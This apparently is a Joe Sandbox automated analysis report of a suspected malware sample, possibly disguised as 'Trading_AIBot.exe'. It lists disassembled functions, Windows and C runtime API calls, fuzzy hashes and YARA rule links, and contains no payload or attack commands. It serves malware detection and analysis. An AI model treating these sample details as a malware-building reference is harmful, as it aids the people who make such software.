Associated: 00000008.00000002.2209421224.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2209421224.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

EntryPoint.RPKHZPUO(80070057), ref: 004017EE

Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030

EntryPoint.RPKHZPUO(80070057), ref: 00401800
EntryPoint.RPKHZPUO(80070057), ref: 00401813
__recalloc.LIBCMT ref: 00401828
EntryPoint.RPKHZPUO(8007000E), ref: 00401839
EntryPoint.RPKHZPUO(8007000E), ref: 00401853
_calloc.LIBCMT ref: 00401861

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
String ID:
API String ID: 1721462702-0
Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(00422910), ref: 00414050

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

KERNEL32, xrefs: 00413610
IsProcessorFeaturePresent, xrefs: 0041361F

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMON

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Analysis Process: Trading_AIBot.exePID: 3404, Parent PID: 3080COMMON

Executed Functions

Function 02587528 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84afd88f2905bfba2bf86351ee571d458a60881339dc694f691a84f5cf29b82b
Instruction ID: 8d08e575e990017db87772caf91e849b0646785c7218ed305cebd93455a14614
Opcode Fuzzy Hash: 84afd88f2905bfba2bf86351ee571d458a60881339dc694f691a84f5cf29b82b
Instruction Fuzzy Hash: 18710175D00219CFDB14EFA4D890AADBBB2FF89300F6081A9D449BB264DB716D4ACF44

Function 02587538 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55dd00b54425cb8fae20a678527739576e50bc87dae72bd218d0c8c4fba34a78
Instruction ID: 4dafc9a4f8ebed79fb0b8a9218a63b3f5abb91380513b7a5ab34bb56aa85b60e
Opcode Fuzzy Hash: 55dd00b54425cb8fae20a678527739576e50bc87dae72bd218d0c8c4fba34a78
Instruction Fuzzy Hash: A661E174D00219CFDB15EFA4D990AADBBB2FF89300F608169D409BB264DB716D4ACF44

Function 02587188 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0790aefd12aa961ed1b8d17d4854b7472833f7b5457ca0d3bc39763c6fa222c6
Instruction ID: 48fb1c4eefc51df8b2c7efca5db15421f647c5ddd8e619ef17dc7c20e3208f94
Opcode Fuzzy Hash: 0790aefd12aa961ed1b8d17d4854b7472833f7b5457ca0d3bc39763c6fa222c6
Instruction Fuzzy Hash: AE61C478A00248CFCB48DFA9D594EADBBB2FF49310F109169E915AB365DB31AC46CF14

Function 02587E5E Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f890c1be096224f0b85f57de90d7feec2fa9f24f0ceb8abf5ec8aaaa533bcf6
Instruction ID: e42ddb15cb35e893c9de0cee82d9a1c78fe43390e69bcff876ca2eb8d5259ecb
Opcode Fuzzy Hash: 1f890c1be096224f0b85f57de90d7feec2fa9f24f0ceb8abf5ec8aaaa533bcf6
Instruction Fuzzy Hash: 0041CCB4D00248DFDB14DFEAD984A9EFBB6BF48304F24802AE409BB250D7749946CF54

Function 02587E60 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db8af9fe895ce8fe5b0cb6427af4822e4722ae8c001859e742390c188877f03f
Instruction ID: 5aa32aa218097952ad92604fa462cb2239fbccfc4071747386a06f97503121ff
Opcode Fuzzy Hash: db8af9fe895ce8fe5b0cb6427af4822e4722ae8c001859e742390c188877f03f
Instruction Fuzzy Hash: 1041BCB4D00248DFDB14DFEAD984A9EFBB6BF48304F24802AE419BB254D7749946CF54

Function 02587F0F Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0fc982cd48285d4069ec9aa536abf3effd053fc674146a742669959e5fa71cd
Instruction ID: 36f387ba064440e783c80e807bfe9c62ccd6644a6b5dbb7f62b13525b39295d3
Opcode Fuzzy Hash: a0fc982cd48285d4069ec9aa536abf3effd053fc674146a742669959e5fa71cd
Instruction Fuzzy Hash: 11012834D00209CFDB10EFA9C4547ADFBB1BF49314F208419D005FB290CBB89986CB54

Function 02585348 Relevance: .9, Instructions: 945COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f5632a907cda75e5ddfbf40e6bd141aeb63f2ea0b7fdca670eb4964613528d0
Instruction ID: 0ea2199ea6d13ff7fb48f328e943af11990168f953d85a0f09a971a5a2e9cf41
Opcode Fuzzy Hash: 2f5632a907cda75e5ddfbf40e6bd141aeb63f2ea0b7fdca670eb4964613528d0
Instruction Fuzzy Hash: 5EB2C07090131ACFDB68EF64C894BADB7B2BB89300F5084E9D44DAB664DB715E82DF44

Function 02585358 Relevance: .9, Instructions: 935COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0145feb4b9c036764ddba6b3f92f07f57e3b5bbdf666fa0a1b7c13244254e529
Instruction ID: 09b275ca3a778973144504e7fcc02008c51f8aa780487474f390ec5038472183
Opcode Fuzzy Hash: 0145feb4b9c036764ddba6b3f92f07f57e3b5bbdf666fa0a1b7c13244254e529
Instruction Fuzzy Hash: 93B2C07091131ACFCB68EF64C894BADB7B2BB89300F5084E9D44DAB664DB715E82DF44

Function 02580839 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8eaa8bef03afc6cee0701a8cebda78bb23f35be05ce281c45279ba2b34386c
Instruction ID: 11005a5e6a8084c69d1c388089cd6ec5fe21f4834f6a23da27ade8a49dc30834
Opcode Fuzzy Hash: 3e8eaa8bef03afc6cee0701a8cebda78bb23f35be05ce281c45279ba2b34386c
Instruction Fuzzy Hash: A862BFB0901219CFDB68EF64D994BAEBBB2BF49301F1080E9D509AB365DB315E85DF40

Function 02580848 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d716319c32a92a42766d651dfc3a4e21a0c0da9dd1088459e5ec282e9fe5247
Instruction ID: 51e810ab80d9487aa307f569891c62357eb345f05e992f86efb5a6fc73877f77
Opcode Fuzzy Hash: 7d716319c32a92a42766d651dfc3a4e21a0c0da9dd1088459e5ec282e9fe5247
Instruction Fuzzy Hash: 5062BEB0901219CFDB68EF64D994BAEBBB2BF49301F1080E9D509AB365DB315E85DF40

Function 02587929 Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56985a9d603f661961c1fc5b7beecabeb796b4cadb211ff3c78453695aca4562
Instruction ID: 5475f4b5ad72e7694bcf339d8c4a56bbe15f9cc3ff12a8be95f2cfaf61f889f9
Opcode Fuzzy Hash: 56985a9d603f661961c1fc5b7beecabeb796b4cadb211ff3c78453695aca4562
Instruction Fuzzy Hash: A4410675E012088FDB04DFA5D894BEEBBB2FF89301F108069E516B72A1DB719941CF54

Function 02587028 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eb3154ad862f6eea628f7a59fa6b45ef6a49b4e7df57177c9b4c6821b6b31a7
Instruction ID: 0539d6cc1d3a86e8d57e8d24edfe4fc4360c46d765933ea6052b512ce43f7973
Opcode Fuzzy Hash: 8eb3154ad862f6eea628f7a59fa6b45ef6a49b4e7df57177c9b4c6821b6b31a7
Instruction Fuzzy Hash: 3161F774A00258CFCB05DFA9D994E9DBBB2FF4A310F1181A9E515AB365DB30AC06CF14

Function 025867F0 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

